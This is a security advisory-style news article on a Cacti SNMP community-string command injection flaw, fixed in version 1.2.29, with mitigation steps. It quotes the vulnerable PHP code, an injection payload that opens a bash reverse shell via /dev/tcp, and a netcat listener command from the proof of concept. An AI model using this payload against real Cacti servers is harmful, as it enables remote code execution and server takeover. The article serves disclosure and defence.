A serious command injection vulnerability in Cacti, a popular open-source network monitoring tool, allows authenticated attackers to execute arbitrary commands remotely.
Dubbed a high-severity issue by security researcher TheWitness, the flaw (GHSA-c7rr-2h93-7gjf) affects versions up to 1.2.28.
Users should update to the patched 1.2.29 release immediately to prevent potential server compromise.
Published last week on GitHub, the vulnerability stems from poor input validation in Cacti’s SNMP device configuration.
Authenticated users can craft malicious SNMP community strings with newline characters, which get stored directly in the database without sanitization.
When Cacti later uses these strings in backend SNMP operations, specific SNMP tools interpret newlines as command separators, enabling remote code execution (RCE) with the web server’s privileges.
Vulnerability Technical Details
Cacti processes device configurations via the host.php?action=save endpoint. Attackers target the snmp_community field, fetched with get_nfilter_request_var(‘snmp_community’). This function skips stripping control characters such as newlines (\n) and shell metacharacters.
The input then passes to api_device_save():
$save['snmp_community'] = form_input_validate(
$snmp_community,
'snmp_community',
'', // Empty regex disables filtering
true,
3
);No escaping or truncation occurs, so a payload like public\nbash -c ‘bash -i >& /dev/tcp/127.0.0.1/4444 0>&1’\n# stores verbatim in the host table.
Triggering SNMP polling (e.g., via Management > Devices) executes the injected command if the SNMP wrapper treats newlines as boundaries.
Here’s a summary of affected and patched versions:
| Component | Affected Versions | Patched Version | Severity |
|---|---|---|---|
| Cacti (PHP) | <= 1.2.28 | 1.2.29 | High |
A proof-of-concept (POC) demonstrates the attack: Start a Netcat listener (nc -lvnp 4444), then POST a crafted request to create a device with the malicious snmp_community.
Visiting the device page in Cacti’s interface triggers SNMP logs and shell access.
Impact and Mitigation Steps
This flaw poses severe risks in typical deployments. Attackers gain arbitrary command execution as the Cacti process user often www-data or apache.
Consequences include data tampering, file writes, lateral movement, or a complete server takeover, especially in environments with SNMP wrappers such as Net-SNMP.
Cacti maintainers fixed it in 1.2.29 by adding proper input sanitization in host.php. Administrators must:
- Upgrade to 1.2.29 or later.
- Review SNMP community strings in the database for anomalies (SELECT * FROM host WHERE snmp_community LIKE ‘%\n%’;).
- Restrict authenticated access to device management.
- Monitor logs for suspicious SNMP activity.
No known exploits in the wild yet, but exposed Cacti instances (over 100,000 per Shodan) draw rapid attention.
This highlights ongoing PHP app risks from unfiltered user input.
